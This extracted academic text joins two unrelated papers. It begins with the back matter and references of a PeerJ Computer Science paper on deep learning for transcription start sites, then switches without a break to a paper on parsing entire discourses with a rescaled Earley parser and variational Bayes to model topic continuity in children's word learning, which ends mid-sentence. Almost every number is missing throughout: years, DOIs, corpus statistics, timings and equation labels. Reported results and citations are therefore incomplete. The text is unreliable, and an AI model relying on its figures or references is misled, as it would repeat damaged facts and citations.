/peerj-cs. / https://peerj.com http://dx.doi.org/ . 
/peerj-cs. additional information and declarations funding this work was supported by the agence nationale pour la recherche [hiresbac anr- -ce - - ]. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: agence nationale pour la recherche [hiresbac anr- -ce - - ]. competing interests the authors declare there are no competing interests. author contributions • ghazaleh khodabandelou conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • etienne routhier performed the experiments, performed the computation work, prepared figures and/or tables, and approved the final draft. • julien mozziconacci conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: code is available at github: https://github.com/studytss/deeptss. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abadi m, agarwal a, barham p. . tensorflow: large-scale machine learning on heterogeneous systems. available at https://www.tensorflow.org/ . alipanahi b, delong a, weirauch mt, frey bj. . predicting the sequence speci- ficities of dna-and rna-binding proteins by deep learning. nature biotechnology ( ): – doi . /nbt. . angermueller c, pärnamaa t, parts l, stegle o. . deep learning for computational biology. molecular systems biology ( ): – doi . /msb. . batista ge, prati rc, monard mc. . a study of the behavior of several methods for balancing machine learning training data. acm sigkdd explorations newsletter ( ): – doi . / . . khodabandelou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/studytss/deeptss http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information https://www.tensorflow.org/ http://dx.doi.org/ . /nbt. http://dx.doi.org/ . /msb. http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. carninci p, sandelin a, lenhard b, katayama s, shimokawa k, ponjavic j, semple ca, taylor ms, engström pg, frith mc. . genome-wide analysis of mam- malian promoter architecture and evolution. nature genetics ( ): – doi . /ng . chawla nv, japkowicz n, kotcz a. . special issue on learning from imbalanced data sets. acm sigkdd explorations newsletter ( ): – . chicco d, jurman g. . the advantages of the matthews correlation coefficient (mcc) over f score and accuracy in binary classification evaluation. bmc ge- nomics ( ): . ching t, himmelstein ds, beaulieu-jones bk, kalinin aa, do bt, way gp, ferrero e, agapow pm, zietz m, hoffman mm. . opportunities and obstacles for deep learning in biology and medicine. journal of the royal society interface ( ): – doi . /rsif. . . chollet f. . keras. available at https://keras.io. deaton am, bird a. . cpg islands and the regulation of transcription. genes & development ( ): – doi . /gad. . down ta, hubbard tj. . computational detection and location of transcrip- tion start sites in mammalian genomic dna. genome research ( ): – doi . /gr. . durham tj, libbrecht mw, howbert jj, bilmes j, noble ws. . 
predictd parallel epigenomics data imputation with cloud-based tensor decomposition. nature communications ( ): – doi . /s - - -w. encode project consortium. . an integrated encyclopedia of dna elements in the human genome. nature ( ): – doi . /nature . georgakilas gk, perdikopanis n, hatzigeorgiou a. . solving the transcrip- tion start site identification problem with adapt-cage: a machine learn- ing algorithm for the analysis of cage data. scientific reports ( ): – doi . /s - - - . goodfellow i, bengio y, courville a. . deep learning. cambridge: mit press. han l, su b, li wh, zhao z. . cpg island density and its correlations with genomic features in mammalian genomes. genome biology ( ): – doi . /gb- - - -r . he h, garcia ea. . learning from imbalanced data. ieee transactions on knowledge and data engineering ( ): – doi . /tkde. . . jaganathan k, panagiotopoulou sk, mcrae jf, darbandi sf, knowles d, li yi, kosmicki ja, arbelaez j, cui w, schwartz gb. . predicting splicing from primary sequence with deep learning. cell ( ): – . kelley dr, reshef y, bileschi m, belanger d, mclean cy, snoek j. . sequential regulatory activity prediction across chromosomes with convolutional neural networks. genome research ( ): – . kelley dr, snoek j, rinn jl. . basset: learning the regulatory code of the accessible genome with deep convolutional neural networks. genome research ( ): – doi . /gr. . . khodabandelou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /ng http://dx.doi.org/ . /rsif. . https://keras.io http://dx.doi.org/ . /gad. http://dx.doi.org/ . /gr. http://dx.doi.org/ . /s - - -w http://dx.doi.org/ . /nature http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /gb- - - -r http://dx.doi.org/ . /tkde. . http://dx.doi.org/ . /gr. . http://dx.doi.org/ . /peerj-cs. kingma dp, ba j. . adam: a method for stochastic optimization. arxiv preprint. arxiv: . . kreyszig e. . advanced engineering mathematics. th eddition. wiley. kugel jf, goodrich ja. . finding the start site: redefining the human initiator element. genes & development ( ): – doi . /gad. . . kundaje a, meuleman w, ernst j, bilenky m, yen a, heravi-moussavi a, kheradpour p, zhang z, wang j, ziller mj. . integrative analysis of reference human epigenomes. nature ( ): – doi . /nature . leung mkk, xiong hy, lee lj, frey bj. . deep learning of the tissue-regulated splicing code. bioinformatics ( ):i –i doi . /bioinformatics/btu . min x, chen n, chen t, jiang r. . deepenhancer: predicting enhancers by con- volutional neural networks. in: bioinformatics and biomedicine (bibm), ieee international conference on. ieee, – . pachganov s, murtazalieva k, zarubin a, sokolov d, chartier dr, tatarinova tv. . transprise: a novel machine learning approach for eukaryotic promoter prediction. peerj :e doi . /peerj. . poplin r, chang pc, alexander d, schwartz s, colthurst t, ku a, newburger d, dijamco j, nguyen n, afshar pt. . a universal snp and small-indel vari- ant caller using deep neural networks. nature biotechnology ( ): – doi . /nbt. . rivera cm, ren b. . mapping human epigenomes. cell ( ): – doi . /j.cell. . . . rumelhart de, hinton ge, williams rj. . learning representations by back- propagating errors. nature ( ): – doi . / a . sandelin a, carninci p, lenhard b, ponjavic j, hayashizaki y, hume da. . mammalian rna polymerase ii core promoters: insights from genome-wide studies. nature reviews genetics ( ): – . sinha au, meller j. . 
cinteny: flexible analysis and visualization of synteny and genome rearrangements in multiple organisms. bmc bioinformatics ( ): doi . / - - - . srivastava n, hinton g, krizhevsky a, sutskever i, salakhutdinov r. . dropout: a simple way to prevent neural networks from overfitting. the journal of machine learning research ( ): – . stein l. . genome annotation: from sequence to biology. nature reviews genetics ( ): – . umarov rk, solovyev vv. . recognition of prokaryotic and eukaryotic promoters using convolutional deep learning neural networks. plos one ( ):e doi . /journal.pone. . vavouri t, lehner b. . human genes with cpg island promoters have a distinct transcription-associated chromatin organization. genome biology ( ): – doi . /gb- - - -r . wainberg m, merico d, delong a, frey bj. . deep learning in biomedicine. nature biotechnology ( ): doi . /nbt. . khodabandelou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://arxiv.org/abs/ . http://dx.doi.org/ . /gad. . http://dx.doi.org/ . /nature http://dx.doi.org/ . /bioinformatics/btu http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /nbt. http://dx.doi.org/ . /j.cell. . . http://dx.doi.org/ . / a http://dx.doi.org/ . / - - - http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /gb- - - -r http://dx.doi.org/ . /nbt. http://dx.doi.org/ . /peerj-cs. waterston rh, lindblad-toh k, birney e, rogers j, abril jf, agarwal p, agar- wala r, ainscough r, alexandersson m, an p. . initial sequencing and comparative analysis of the mouse genome. nature ( ): – doi . /nature . wesolowska-andersen a, yu gz, nylander v, abaitua f, thurner m, torres jm, mahajan a, gloyn al, mccarthy mi. . deep learning models predict regulatory variants in pancreatic islets and refine type diabetes association signals. elife :e doi . /elife. . zhou j, troyanskaya og. . predicting effects of noncoding variants with deep learning–based sequence model. nature methods ( ): – doi . /nmeth. . zou j, huss m, abid a, mohammadi p, torkamani a, telenti a. . a primer on deep learning in genomics. nature genetics ( ): – . khodabandelou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /nature http://dx.doi.org/ . /elife. http://dx.doi.org/ . /nmeth. http://dx.doi.org/ . /peerj-cs. parsing entire discourses as very long strings: capturing topic continuity in grounded language learning minh-thang luong department of computer science stanford university stanford, california lmthang@stanford.edu michael c. frank department of psychology stanford university stanford, california mcfrank@stanford.edu mark johnson department of computing macquarie university sydney, australia mark.johnson@mq.edu.au abstract grounded language learning, the task of map- ping from natural language to a representation of meaning, has attracted more and more in- terest in recent years. in most work on this topic, however, utterances in a conversation are treated independently and discourse struc- ture information is largely ignored. in the context of language acquisition, this indepen- dence assumption discards cues that are im- portant to the learner, e.g., the fact that con- secutive utterances are likely to share the same referent (frank et al., ). the current pa- per describes an approach to the problem of simultaneously modeling grounded language at the sentence and discourse levels. 
we combine ideas from parsing and grammar induction to produce a parser that can handle long input strings with thousands of tokens, creating parse trees that represent full discourses. by casting grounded language learning as a grammatical inference task, we use our parser to extend the work of johnson et al. ( ), investigating the importance of discourse continuity in children's language acquisition and its interaction with social cues. our model boosts performance in a language acquisition task and yields good discourse segmentations compared with human annotators. introduction learning mappings between natural language (nl) and meaning representations (mr) is an important goal for both computational linguistics and cognitive science. accurately learning novel mappings is crucial in grounded language understanding tasks, and such systems can suggest insights into the nature of children's language learning. two influential examples of grounded language learning tasks are the sportscasting task, robocup, where the nl is the set of running commentary and the mr is the set of logical forms representing actions like kicking or passing (chen and mooney, ), and the cross-situational word-learning task, where the nl is the caregiver's utterances and the mr is the set of objects present in the context (siskind, ; yu and ballard, ). work in these domains suggests that, based on the co-occurrence between words and their referents in context, it is possible to learn mappings between nl and mr even under substantial ambiguity. nevertheless, contexts like robocup—where every single utterance is grounded—are extremely rare. much more common are cases where a single topic is introduced and then discussed at length throughout a discourse. in a television news show, for example, a topic might be introduced by presenting a relevant picture or video clip. once the topic is introduced, the anchors can discuss it by name or even using a pronoun without showing a picture. the discourse is grounded without having to ground every utterance. moreover, although previous work has largely treated utterance order as independent, the order of utterances is critical in grounded discourse contexts: if the order is scrambled, it can become impossible to recover the topic. supporting this idea, frank et al. ( ) found that topic continuity—the tendency to talk about the same topic in multiple utterances that are contiguous in time—is both prevalent and informative for word learning. this paper examines the importance of topic continuity through a grammatical inference problem. [figure : unigram social cue pcfgs (johnson et al., ) – shown is a parse tree of the input utterance "wheres the piggie" accompanied with social cue prefixes, indicating that the caregiver is holding a pig toy while the child is looking at it; at the same time, a dog toy is present on the screen.] we build on johnson et al. ( )'s work that used grammatical inference to
our main contribution lies in the novel integra- tion of existing techniques and algorithms in parsing and grammar induction to offer a complete solution for simultaneously modeling grounded language at the sentence and discourse levels. specifically, we: ( ) use the earley algorithm to exploit the special structure of our grammars, which are deterministic or have at most bounded ambiguity, to achieve ap- proximately linear parsing time; ( ) suggest a rescal- ing approach that enables us to build a pcfg parser capable of handling very long strings with thou- sands of tokens; and ( ) employ variational bayes for grammatical inference to obtain better grammars than those given by the em algorithm. by parsing entire discourses at once, we shed light on a scientifically interesting question about why the child’s own gaze is a positive cue for word learn- ing (johnson et al., ). our data provide support for the hypothesis (from previous work) that care- givers “follow in”: they name objects that the child is already looking at (tomasello and farrar, ). in addition, our discourse model produces a perfor- mance improvement in a language acquisition task and yields good discourse segmentations compared with human annotators. related work supervised semantic parsers. previous work has developed supervised semantic parsers to map sen- tences to meaning representations of various forms, including meaning hierarchies (lu et al., ) and, most dominantly, λ-calculus expressions (zettle- moyer and collins, ; zettlemoyer, ; wong and mooney, ; kwiatkowski et al., ). these approaches rely on training data of annotated sentence-meaning pairs, however. such data are costly to obtain and are quite different from the ex- perience of language learners. grounded language learning. in contrast to se- mantic parsers, grounded language learning systems aim to learn the meanings of words and sentences given an observed world state (yu and ballard, ; gorniak and roy, ). a growing body of work in this field employs distinct techniques from a wide variety of perspectives from text-to-record align- ment using structured classification (barzilay and lapata, ; snyder and barzilay, ), iterative retraining (chen et al., ), and generative models of segmentation and alignment (liang et al., ) to text-to-interaction mapping using reinforcement learning (branavan et al., ; vogel and juraf- sky, ), graphical model semantics representa- tion (tellex et al., a; tellex et al., b), and combinatory categorial grammar (artzi and zettle- moyer, ). a number of systems have also used alternative forms of supervision, including sentences paired with responses (clarke et al., ; gold- wasser and roth, ; liang et al., ) and no supervision (poon and domingos, ; gold- wasser et al., ). recent work has also introduced an alternative approach to grounded learning by reducing it to a grammatical inference problem. börschinger et al. ( ) casted the problem of learning a semantic parser as a pcfg induction task, achieving state-of the art performance in the robocup domain. kim and mooney ( ) extended the technique to make it tractable for more complex problems. later, kim and mooney ( ) adapted discriminative rerank- ing to the grounded learning problem using a form of weak supervision. we employ this general gram- matical inference approach in the current work. children language acquisition. in the context of language acquisition, frank et al. 
( ) proposed a system that learned words and jointly inferred speakers’ intended referent (utterance topic) using graphical models. johnson et al. ( ) used gram- matical inference to demonstrate the importance of social cues in children’s early word learning. we ex- tend this body of work by capturing discourse-based dependencies among utterances rather than treating each utterance independently. discourse parsing. a substantial literature has ex- amined formal representations of discourse across a wide variety of theoretical perspectives (mann and thompson, ; scha and polanyi, ; hobbs, ; lascarides and asher, ; knott and sanders, ). although much of this work was highly influential, marcu ( )’s work on dis- course parsing brought this task to special promi- nence. since then, more and more sophisticated models of discourse analysis have been developed:, e.g., (marcu, ; soricut and marcu, ; forbes et al., ; polanyi et al., ; baldridge and las- carides, ; subba and di eugenio, ; her- nault et al., ; lin et al., ; feng and hirst, ). our contribution to work on this task is to examine latent discourse structure specifically in grounded language learning. a grounded learning task our focus in this paper is to develop computational models that help us better understand children’s lan- guage acquisition. the goal is to learn both the long term lexicon of mappings between words and objects (language learning) as well as the intended topic of individual utterances (language comprehen- sion). we consider a corpus of child-directed speech annotated with social cues, described in (frank et al., ). there are a total of , utterances in the corpus, each of which is orthographically- transcribed from videos of caregivers playing with pre-linguistic children of various ages ( , , and months) during home visits. each utterance was hand-annotated with objects present in the (non-linguistic) context, e.g. dog and pig (fig- ure ), together with sets of social cues, one set per object. the social cues describe objects the care-giver is looking at (mom.eyes), holding onto (mom.hands), or pointing to (mom.point); sim- ilarly, for (child.eyes) and (child.hands). . sentence-level models motivated by the importance of social information in children’s early language acquisition (carpenter et al., ), johnson et al. ( ) proposed a joint model of non-linguistic information including the physical context and social cues, and the linguis- tic content of individual utterances. they framed the joint inference problem of inferring word-object mappings and inferring sentence topics as a gram- mar induction task where input strings are utterances prefixed with non-linguistic information. objects present in the non-linguistic context of an utterance are considered its potential topics. there is also a special null topic, none, to indicate non-topical ut- terances. the goal of the model is then to select the most probable topic for each utterance. top-level rules, sentence → topict wordst (unigram pcfg) or sentence → topict collocst (collocation adaptor grammar), are tai- lored to link the two modalities (t ranges over t ′, the set of all available topics (t ) and none). these rules enforce sharing of topics between prefixes (topict) and words (wordst or collocst). each word in the utterance is drawn from either a topic- specific distribution wordt or a general “null” dis- tribution wordnone. 
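as a concrete illustration of this rule schema, the sketch below (python; the topic inventory, vocabulary, and probabilities are placeholders of our own choosing, and social-cue generation is omitted, so this is not the grammar actually induced in the paper) enumerates topic-linked top-level rules and topic-specific word distributions in the spirit of the unigram pcfg:

```python
# illustrative sketch of the topic-prefixed unigram pcfg schema; topic names,
# vocabulary and probabilities are placeholders, not the induced grammar.
topics = ["pig", "dog"]                    # objects present in the context
vocab = ["wheres", "the", "piggie", "doggie"]

rules = []  # (lhs, rhs, prob)

# top-level rules tie a topic prefix to a topic-specific word sequence:
#   Sentence -> Topic_t Words_t    for every topic t, plus the null topic
for t in topics + ["none"]:
    rules.append(("Sentence", ("Topic_" + t, "Words_" + t), 1.0 / (len(topics) + 1)))

# under Words_t, every word token is drawn either from the topic-specific
# distribution Word_t or from the shared null distribution Word_none
for t in topics + ["none"]:
    emitters = ["Word_" + t] if t == "none" else ["Word_" + t, "Word_none"]
    p = 1.0 / (2 * len(emitters))          # continue / stop, for each emitter
    for e in emitters:
        rules.append(("Words_" + t, (e, "Words_" + t), p))   # emit and continue
        rules.append(("Words_" + t, (e,), p))                # emit and stop

# word emissions start out uniform; learning concentrates Word_t on topical words
for t in topics + ["none"]:
    for w in vocab:
        rules.append(("Word_" + t, (w,), 1.0 / len(vocab)))

for lhs, rhs, p in rules[:8]:
    print(lhs, "->", " ".join(rhs), round(p, 3))
```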
as illustrated in figure , the selected topic, pig, is propagated down to the input string through two paths: (a) through topical nodes until an object is reached, in this case the .pig object, and (b) through lexical nodes to topical word tokens, e.g. piggie. (caregivers were given pairs of toys to play with, e.g. a stuffed dog and pig, or a wooden car and truck.) social cues are then generated by a series of binary decisions as detailed in johnson et al. ( ). the key feature of these grammars is that parameter inference corresponds both to learning word-topic relations and to learning the salience of social cues in grounded learning. in the current work, we restrict our attention to only the unigram pcfg model to focus on investigating the role of topic continuity. unlike the approach of johnson et al. ( ), which uses markov chain monte carlo techniques to perform grammatical inference, we experiment with variational bayes methods, detailed in section . . a discourse-level model topic continuity—the tendency to group utterances into coherent discourses about a single topic—may be an important source of information for children learning the meanings of words (frank et al., ). to address this issue, we consider a new discourse-level model of grounded language that captures dependencies between utterances. by linking multiple utterances in a single parse, our proposed grammatical formalism is a bigram markov process that models transitions among utterance topics. our grammar starts with a root symbol discourse, which then selects a starting topic through a set of discourse-initial rules, discourse → discourse_t for t ∈ t′. each of the discourse_t nodes generates an utterance of the same topic, and advances into other topics through transition rules, discourse_t → sentence_t discourse_t′ for t′ ∈ t′. discourses terminate by ending rules, discourse_t → sentence_t. other rules in the unigram pcfg model by johnson are reused, except for the top-level rules, in which we replace the non-terminal sentence by topic-specific ones, sentence_t. . parsing discourses and challenges using a discourse-level grammar, we must parse a concatenation of all the utterances (with annotations) in each conversation. this concatenation results in an extremely long string: in the social-cue corpus (frank et al., ), the average length of these per-recording concatenations is tokens (σ= ). parsing such strings poses many challenges for existing algorithms. for familiar algorithms such as cyk, runtime quickly becomes enormous: the time complexity of cyk is o(n³) for an input of length n. fortunately, we can take advantage of a special structural property of our grammars. the shape of the parse tree is completely determined by the input string; the only variation is in the topic annotations in the nonterminal labels. so even though the number of possible parses grows exponentially with input length n, the number of possible constituents grows only linearly with input length, and the possible constituents can be identified from the left context. these constraints ensure that the earley algorithm (earley, ) will parse an input of length n with this grammar in time o(n). a second challenge in parsing very long strings is that the probability of a parse is the product of the probabilities of the rules involved in its derivation.
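to make the scale of this problem concrete before the remedies are discussed, a small numeric sketch (the rule probability and derivation length are made-up illustrative values) shows how quickly such a product leaves the range of double-precision floats, while its logarithm only shrinks linearly:

```python
import math

# made-up illustrative values: a typical rule probability and a derivation
# length of the order needed for a discourse-long input (thousands of tokens)
p_rule, n_steps = 0.3, 2000

prob = 1.0
for _ in range(n_steps):
    prob *= p_rule
print(prob)                        # 0.0 -- the product underflows double precision

# the same quantity kept in log space stays perfectly representable
print(n_steps * math.log(p_rule))  # roughly -2408
```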
as the length of a derivation grows linearly with the length of the input, the parse probabilities decrease exponentially as a function of sentence length, causing floating-point underflow on inputs of even moderate length. the standard method for handling this is to compute log probabilities (which decrease linearly as a function of input length, rather than exponentially), but as we explain later (section ), we can use the ability of the earley algorithm to compute prefix probabilities (stolcke, ) to rescale the probability of the parse incrementally and avoid floating-point underflows. in the next section, we provide background information on the earley algorithm for pcfgs, the prefix probability scheme we use, and the inside-outside algorithm in the earley context. background . earley algorithm for pcfgs the earley algorithm was developed by earley ( ) and is known to be efficient for certain kinds of cfgs (aho and ullman, ). an earley parser constructs left-most derivations of strings, using dotted productions to keep track of partial derivations. (the prefix markers # and ## and the topic markers such as ".dog" enable a left-to-right parser to unambiguously identify its location in the input string. in order to achieve linear time, the parsing chart must have suitable indexing; see aho and ullman ( ), leo ( ) and aycock and horspool ( ) for details.) specifically, each state in an earley parser is represented as [l,r]: x → α . β to indicate that input symbols x_l, . . . , x_{r−1} have been processed and the parser is expecting to expand β. states are generated on the fly using three transition operations: predict (add states to charts), scan (shift dots across terminals), and complete (merge two states). figure shows an example of a completion step, which also illustrates the implicit binarization automatically done in the earley algorithm. [figure : completion step – merging two states [l,m]: x → α . y β and [m,r]: y → ν . to produce a new state [l,r]: x → α y . β.] in order to handle pcfgs, stolcke ( ) extends the earley parsing algorithm to introduce the notion of an earley path, a sequence of states linked by earley operations. by establishing a one-to-one mapping between partial derivations and earley paths, stolcke could then assign each path a derivation probability, that is, the product of all rule probabilities used in the predicted states of that path. here, each production x → ν corresponds to a predicted state [l, l]: x → . ν. besides parsing, being able to compute string and prefix probabilities by summing derivation probabilities is also of great importance. to compute these sums efficiently, each earley state is attached with a forward and an inner probability, which are updated incrementally as new states are spawned by the three transition operations. . forward and prefix probabilities intuitively, the forward probability of a state [l,r]: x → α . β is the probability of an earley path through that state, generating input up to position r−1. this probability generalizes a similar concept in hmms and lends itself to the computation of prefix probabilities, sums of forward probabilities over scanned states yielding a prefix x. computing prefix probabilities is important because it enables probabilistic prediction of possible follow-words x_{i+1} as p(x_{i+1} | x_0 . . . x_i) = p(x_0 . . . x_i x_{i+1}) / p(x_0 . . . x_i) (jelinek and lafferty, ).
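the relation between prefix probabilities and next-word prediction can be written out in a few lines; the prefix probabilities below are placeholders standing in for the sums of forward probabilities that the parser actually computes:

```python
import math

# prefix_prob[i] stands for p(x_0 ... x_{i-1}), the probability that the grammar
# generates the first i input symbols as a prefix; placeholder values only
prefix_prob = {0: 1.0, 1: 2e-2, 2: 8e-4, 3: 2e-5}

def next_symbol_prob(i):
    """p(x_i | x_0 ... x_{i-1}) = p(x_0 ... x_i) / p(x_0 ... x_{i-1})"""
    return prefix_prob[i + 1] / prefix_prob[i]

def surprisal(i):
    """negative log conditional probability of symbol x_i, in nats"""
    return -math.log(next_symbol_prob(i))

for i in range(3):
    print(i, next_symbol_prob(i), round(surprisal(i), 3))
```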
these conditional probabilities allow estimation of the incremental costs of a stack decoder (bahl et al., ). in (huang and sagae, ), a conceptually similar prefix cost is defined to order states in a beam search decoder. moreover, the negative logarithms of such conditional probabilities are termed surprisal values in the psycholinguistics literature (e.g., hale, ; levy, ), describing how difficult a word is in a given context. interestingly, as we show next, prefix probabilities lead us to construct a parser that can parse extremely long strings. . inside outside algorithm to extend the inside outside (io) algorithm (baker, ) to the earley context, stolcke introduced inner and outer probabilities, which generalize the inside and outside probabilities of the io algorithm. specifically, the inner probability of a state [l,r]: x → α . β is the probability of generating an input substring x_l, . . . , x_{r−1} from a non-terminal x using a production x → α β. [figure : inner and outer probabilities. the outer probability of x → α . y β is a sum of all products of its parent outer probability (x → α y . β) and its sibling inner probability (y → ν .). similarly, the outer probability of y → ν . is derived from the outer probability of x → α y . β and the inner probability of x → α . y β.] once all inner probabilities have been populated in a forward pass, outer probabilities are derived backward, starting from the outer probability of the goal state [0, n]: → s . being set to 1. here, each earley state is associated with an outer probability, which complements the inner probability by referring precisely to those parts (not covered by the corresponding inner probability) of the complete paths generating the input string x. the implicit binarization in summing up inner probabilities of all states y → ν . exactly yields baker's inside probability for y. earley parsing allows outer probabilities to be accumulated in a similar way as their counterpart in the io algorithm (see figure ). these quantities allow for efficient grammatical inference, in which the expected count of each rule x → λ given a string x is computed as: c(x → λ | x) = Σ_{s: [l,r] x → . λ} outer(s) · inner(s) / p(s ⇒∗ x) ( ). a rescaling approach for parsing our parser originated from the prefix probability parser by levy ( ), but has diverged markedly since then. the parser, called earleyx, is capable of producing viterbi parses and performing grammatical induction based on the expectation-maximization and variational bayes algorithms. to tackle the underflow problem posed when parsing discourses (§ . ), we borrow the rescaling concept from hmms (rabiner, ) to extend the probabilistic earley algorithm. specifically, the probability of each earley path is scaled by a constant c_i each time it passes through a scanned state generating the input symbol x_i. in fact, each path passes through each scanned state exactly once, so we consistently accumulate scaling factors for the forward and inner probabilities of a state [l,r]: x → α . β as c_0 · · · c_{r−1} and c_l · · · c_{r−1}, respectively. arguably, the most intuitive choice of the scaling factors is based on the prefix probabilities, which essentially resets the probability of any earley path starting from any position i to 1. concretely, we set c_0 = 1/p(x_0) and c_i = p(x_0 . . . x_{i−1}) / p(x_0 . . . x_i) for i = 1, . . . , n−1, where n is the input length. as noted in section § . , the logarithm of c_i gives us the surprisal value for the input symbol x_i.
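the rescaling bookkeeping itself is compact; the sketch below uses placeholder per-symbol conditional probabilities in place of real earley forward sums, and shows that the scaled running quantity stays near one while the scaling constants retain both the string log-probability and the per-symbol surprisals:

```python
import math

# placeholder conditionals p(x_i | x_0 .. x_{i-1}); in the parser these come
# from ratios of prefix probabilities computed in the earley forward pass
cond = [0.02, 0.1, 0.005, 0.3]

scaled = 1.0          # scaled path probability, kept near 1.0
log_prob = 0.0        # log p(x_0 .. x_i) reconstructed from the scaling constants
surprisals = []

for p in cond:
    scaled *= p               # an unscaled update would drift toward underflow
    c = 1.0 / scaled          # scaling constant: the prefix-probability ratio
    scaled *= c               # after scaling, the path probability is reset to 1
    log_prob -= math.log(c)   # the constants carry the true magnitude
    surprisals.append(math.log(c))   # log c_i is the surprisal of symbol x_i

print(log_prob, sum(math.log(p) for p in cond))  # equal up to rounding
print([round(s, 3) for s in surprisals])
```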
rescaling factors are only introduced in the forward pass, during which the outer probability of a state [l,r]: x → α . β has already been scaled by factors c_0 · · · c_{l−1} c_r · · · c_{n−1}. (the outer probability of a state is essentially the product of inner probabilities covering all input symbols outside the span of that state. for grammars containing cyclic unit productions, we also need to multiply with terms from the unit-production relation matrix (stolcke, ). parser code is available at http://nlp.stanford.edu/~lmthang/earleyx.) more importantly, when computing expected counts, scaling factors in the outer and inner terms cancel out with those in the string probability in eq. ( ), implying that rule probability estimation is unaffected by rescaling. . parsing time on dense grammars we compare in table the parsing time (on a . ghz xeon cpu) of our parser (earleyx) and levy's. the task is to compute surprisal values for a -word sentence over a dense grammar (with rule probabilities mle-estimated from the english penn treebank). given that our parser is now capable of performing scaling to avoid underflow, we avoid converting probabilities to logarithmic form, which yields a speedup of about times compared to levy's parser. [table : parsing time (dense grammars) – time in seconds to compute surprisal values for a -word sentence using levy's ( ) parser and ours (earleyx + scaling).] . parsing time on sparse grammars [figure : parsing time (sparse grammars) – time in seconds to compute viterbi parses for sentences of increasing lengths (# words).] figure shows the time taken (as a function of the input length) for earleyx to compute viterbi parses over our sparse grammars (§ . ). the plot confirms our analysis in that the special structure of our grammars yields approximately linear parsing time in the input length (see § . ). grammar induction we employ a variational bayes (vb) approach to perform grammatical inference instead of the standard inside outside (io) algorithm, or equivalently the expectation maximization (em) algorithm, for several reasons: ( ) it has been shown to be less likely to cause over-fitting for pcfgs than em (kurihara and sato, ) and ( ) implementation-wise, vb is a straightforward extension of em, as they both share the same process of computing the expected counts (the io part) and only differ in how rule probabilities are reestimated. at the same time, vb has also been demonstrated to do well on large datasets and is competitive with gibbs samplers while having the fastest convergence time among these estimators (gao and johnson, ). the rule reestimation in vb is carried out as follows. let α_r be the prior hyperparameter of a rule r in the rule set r and c_r be its expected count accumulated over the entire corpus after an io iteration. the posterior hyperparameter for r is α*_r = α_r + c_r. let ψ be the digamma function; the rule parameter update formula is: θ_{r: x→λ} = exp[ ψ(α*_r) − ψ( Σ_{r′: x→λ′} α*_{r′} ) ]. whereas io minimizes the negative log-likelihood of the observed data (sentences), −log p(x), vb minimizes a quantity called free energy, which we will use later to monitor convergence. here x denotes the observed data and θ represents the model parameters (pcfg rule probabilities). following (kurihara and sato, ), we compute the free energy as: f(x, θ) = −log p(x) + Σ_{x∈n} log[ Γ(Σ_{r: x→λ} α*_r) / Γ(Σ_{r: x→λ} α_r) ] − Σ_{r∈r} ( log[ Γ(α*_r) / Γ(α_r) ] + c_r log θ_r ), where Γ denotes the gamma function.
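a minimal sketch of the rule re-estimation step above (using scipy's digamma; the prior hyperparameters and expected counts are invented illustrative numbers, and rules are grouped by left-hand side because the normalising digamma term runs over all expansions of the same non-terminal):

```python
import math
from collections import defaultdict
from scipy.special import digamma

# invented illustrative numbers: dirichlet priors alpha_r and expected counts c_r
prior = {("Word_pig", "piggie"): 0.1, ("Word_pig", "the"): 0.1, ("Word_pig", "wheres"): 0.1,
         ("Word_none", "the"): 1.0, ("Word_none", "wheres"): 1.0}
count = {("Word_pig", "piggie"): 7.2, ("Word_pig", "the"): 0.4,
         ("Word_none", "the"): 5.1, ("Word_none", "wheres"): 3.3}

# posterior hyperparameters: alpha*_r = alpha_r + c_r
posterior = {r: a + count.get(r, 0.0) for r, a in prior.items()}

# group rules by their left-hand side non-terminal
by_lhs = defaultdict(dict)
for (lhs, rhs), a in posterior.items():
    by_lhs[lhs][(lhs, rhs)] = a

# theta_r = exp( psi(alpha*_r) - psi( sum of alpha*_r' over rules with the same lhs ) )
theta = {}
for lhs, rules in by_lhs.items():
    total = sum(rules.values())
    for r, a in rules.items():
        theta[r] = math.exp(digamma(a) - digamma(total))

for r, v in sorted(theta.items()):
    print(r, round(v, 4))
```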
sparse dirichlet priors in our application, since each topic should only be associated with a few words rather than the entire vocabulary, we impose sparse dirichlet priors over the wordt distributions by setting a symmetric prior α< for all rules wordt→w (∀t ∈ t,w ∈ w), where w is the set of all words in the corpus. this biases the model to select only a few rules per non- terminal wordt. for all other rules, a uniform hy- perparameter value of is used. we initialized rule probabilities with uniform distributions plus random noise. it is worthwhile to mention that sparse dirich- let priors were proposed in johnson ( )’s work that learns latent dirchlet allocation topic models using bayesian inference for pcfgs. experiments our experiments apply sentence- and discourse- level models to the annotated corpus of child- directed speech described in section . each model is evaluated on (a) topic accuracy—how many utter- ances are labeled with correct topics (including the null), (b) topic metrics (f-scores/precision/recall)— how well the model predicts non-null topical utter- ances, (c) word metrics—how well the model pre- dicts topical words, and (d) lexicon metrics—how well word types are assigned to the topic that they attach to most frequently. for example, in figure , the model assigns topic pig to the entire utterance. at the word level, it labels piggie with topic pig and assigns null topic to wheres and the. see (johnson et al., ) for more details of these metrics. in section . , we examine baseline models that do not make use of social cues (mother and child’s eye-gaze and hand position) to discover the topic; these baselines are contrasted with a range of social cues (§ . and § . ). in section . , we evaluate the discourse structures discovered by our models. . baseline models (no social cues) to create baselines for later experiments, we eval- uate our models without social information. we compare sentence-level models using three different inference procedures—markov chain monte carlo (mcmc) (johnson et al., ), expectation max- imization (em), and variational bayes (vb) —as well as the discourse-level model described above. it is important to not sparsify the wordnone distribution since wordnone could expand into many non-topical words. topics assigned by the model are compared with those given by the 